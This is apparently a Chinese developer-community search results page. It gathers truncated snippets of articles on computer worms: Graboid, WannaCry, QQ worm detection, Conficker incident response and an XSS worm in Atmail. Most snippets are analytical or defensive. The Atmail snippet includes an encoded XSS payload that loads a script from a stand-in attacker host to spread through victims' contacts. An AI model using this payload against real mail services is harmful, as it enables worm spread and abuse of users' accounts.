首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Graboid蠕虫分析

研究人员发现了名为Graboid的新型加密劫持蠕虫,该蠕虫已传播到2,000多个不安全的Docker主机。...曾经发生过以蠕虫病毒形式传播加密劫持恶意软件的事件,但这是第一次看到使用Docker Engine中的容器传播的加密劫持蠕虫。...该恶意软件“ Graboid”在容器内部进行蠕虫传播和加密劫持。它在每次迭代中随机选择三个目标,在第一个目标上安装蠕虫,在第二个目标上停止采矿,在第三个目标上启动采矿。...蠕虫模拟 为了更好地了解蠕虫的有效性及其整体挖掘能力,我们创建了一个简单的Python程序来模拟蠕虫。...总结 此劫持蠕虫不涉及复杂的策略、技术、传播过程,但该蠕虫可以定期从C2中提取新脚本,因此它可以轻松地将其自身重新用于勒索软件或任何恶意软件。

97940

勒索蠕虫爆发背后

2017年5月12日晚8时,勒索蠕虫爆发,很多人中招。大家口耳相传时,说什么都无所谓,毕竟大众不是专业技术人士。但是一些有知名度的自媒体,未弄清楚事实便以讹传讹,这就不好了。...有些人描述这起蠕虫爆发事件时,居然说是“比特币病毒肆虐,遭殃的是一篇篇毕业论文”。这样戏剧性的题目,显然抓住了不少读者的眼球。但是事实是否真的如此呢?...这是黑客利用NSA的“永恒之蓝”武器级工具泄露版本制作出来的蠕虫,学名叫做”WannaCry”。就是让你遇到就想哭。它可能确实做到了。 为什么是教育网?...这次蠕虫爆发,新的Windows 10系统基本上都幸免于难,及时升级打补丁的Windows 7也大多没事儿。你可能觉得困惑,中招的那些人为啥不升级呢? 这里面主要有两个原因。...对这次的蠕虫爆发事件,你怎么看?有没有什么好的防范建议呢?欢迎留言,我们一起讨论。 ----

60940
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    QQ蠕虫的行为检测方法

    作者 Nandisec 选题背景QQ蠕虫是一种利用QQ等腾讯公司相关产品进行传播的一种特殊蠕虫,该蠕虫的基本原理是利用了QQ帐户的快速登录机制,只要当前系统中有一个QQ帐户成功登录,就可以通过后台接口实现该帐户相关应用的快速登录而不需要再次输入帐户密码...登录后蠕虫可以访问QQ应用的各种网络接口,例如:通过接口实现加QQ好友、加入QQ群、发消息、发日志、发微博、上传群共享文件等操作,且完全不需要用户同意。借用这种技术,QQ蠕虫可以实现非常快速的传播。...这种蠕虫诞生于QQ体系之上,其影响和传播主要集中在国内地区,因此国外品牌的杀软对这类蠕虫识别和支持非常有限,国内的杀软品牌对该蠕虫检测也不是特别理想,从而导致了该QQ蠕虫的传播更加快速,影响范围更广。

    84180

    WannaCry 蠕虫详细分析

    背景: 2017 年 5 月 12 日,WannaCry 蠕虫通过 MS17-010 漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密,本文对其进行详细分析...WannaCry 木马利用前阵子泄漏的方程式工具包中的“永恒之蓝”漏洞工具,进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载 WannaCry 木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散...2、蠕虫行为: 通过创建服务启动,每次开机都会自启动 从木马自身读取 MS17_010 漏洞利用代码,playload 分为 x86 和 x64 两个版本。...创建两个线程,分别扫描内网和外网的 IP,开始进程蠕虫传播感染。

    3.3K01

    Window应急响应(二):蠕虫病毒

    0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序...常见的蠕虫病毒:熊猫烧香病毒 、冲击波/震荡波病毒、conficker病毒等。...确认服务器感染conficker蠕虫病毒,下载conficker蠕虫专杀工具对服务器进行清查,成功清楚病毒。 ?...大致的处理流程如下: 1、发现异常:出口防火墙、本地端口连接情况,主动向外网发起大量连接 2、病毒查杀:卡巴斯基全盘扫描,发现异常文件 3、确认病毒:使用多引擎在线病毒对该文件扫描,确认服务器感染conficker蠕虫病毒...4、病毒处理:使用conficker蠕虫专杀工具对服务器进行清查,成功清除病毒。

    1.4K40

    腾讯安全团队深入解析wannacry蠕虫病毒

    作者:腾讯电脑管家 来源: http://www.freebuf.com/articles/system/134578.html 背景: 2017年5月12日,WannaCry蠕虫通过MS17-010...漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密,本文对其进行详细分析。...WannaCry木马利用前阵子泄漏的方程式工具包中的“永恒之蓝”漏洞工具,进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散...2、蠕虫行为: 通过创建服务启动,每次开机都会自启动。 从木马自身读取MS17_010漏洞利用代码,playload分为x86和x64两个版本。...创建两个线程,分别扫描内网和外网的IP,开始进程蠕虫传播感染。 对公网随机ip地址445端口进行扫描感染。 对于局域网,则直接扫描当前计算机所在的网段进行感染。 感染过程,尝试连接445端口。

    1.2K50

    【国庆快乐^^】如何在Atmail上构建XSS蠕虫

    如何在Atmail上构建XSS蠕虫 这篇博客文章由高级安全分析师Zach Julian撰写; 你可以在Twitter上与他联系。 Atmail是云端和本地电子邮件托管的受欢迎的提供商。...最着名的XSS蠕虫病例在2005年影响了MySpace ,2014年的TweetDeck更新版本更新。 在这篇文章中,我将展示构建一个通过受害者联系人传播的XSS有效载荷的蠕虫测试。...构建蠕虫 找到可以用的的XSS向量后,下一步是创建一个可以传播我的电子邮件蠕虫xss payload 我写了一些JavaScript代码 分三步: 提取受害者的联系人列表 从atmail...aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw=='));//> 一切都搞定后,蠕虫已经开始运作了...下面这个视频演示了它的整个逻辑过程: atmail上的XSS蠕虫将有利于垃圾邮件发送者和其他恶意软件 谁将受益于操纵受害者发送的行为者 任意消息到他们的联系人列表。

    89960

    蠕虫病毒--互联网时代的瘟疫

    其传播主要体现在以下两个方面: (1),系统漏洞 (2),电子邮件 蠕虫病毒采用的是互联网复制传播而不是插入PE格式文件 2,蠕虫的基本程序结构 传播模块:主要负责蠕虫病毒的传播。...4,蠕虫病毒的传播方式 (1)利用系统漏洞 系统漏洞蠕虫一般具备一个小型的溢出系统,它随机产生IP并尝试溢出,然后将自身复制过去。...正因为这样,邮件蠕虫才成了如今世界“虫害”的主要来源。 包含蠕虫的邮件---错误的MIME头部---解出的蠕虫程序---感染机器 靠邮件传播的蠕虫主要有SoBig,MyDoom,求职信等。...,但是蠕虫病毒完全不用。...(2)传统机房的日志或者行为记录工具是无法检测到蠕虫感染的,也就是说光从日志文件中是看不出有无蠕虫攻击,尽管更新系统补丁在一定程度上可以防御蠕虫感染,但如果是新型蠕虫病毒,病毒中使用了0Day漏洞,那么更新系统的补丁将会是没有作用的

    1.6K10

    Wannacry蠕虫勒索软件处置流程及方案

    Wannacry蠕虫勒索软件处置流程及工具包 1、背景 5月12日晚,一款名为Wannacry 的蠕虫勒索软件袭击全球网络,这被认为是迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织...该软件被认为是一种蠕虫变种(也被称为“Wannadecrypt0r”、“wannacryptor”或“ wcry”)。...蠕虫软件正是利用 SMB服务器漏洞,通过渗透到未打补丁的Windows计算机中,实现大规模迅速传播。 一旦你所在组织中一台计算机受攻击,蠕虫会迅速寻找其他有漏洞的电脑并发起攻击。...参考链接:http://www.freebuf.com/news/134512.html 2、处置流程 Wannacry蠕虫勒索软件处置流程及工具包(含离线补丁) https://pan.baidu.com...5、附录:个版本系统补丁包下载 Wannacry蠕虫勒索软件处置流程及工具包(含离线补丁) https://pan.baidu.com/s/1o8ludfk 离线升级包(长按复制在浏览器中打开):

    1.6K70
    领券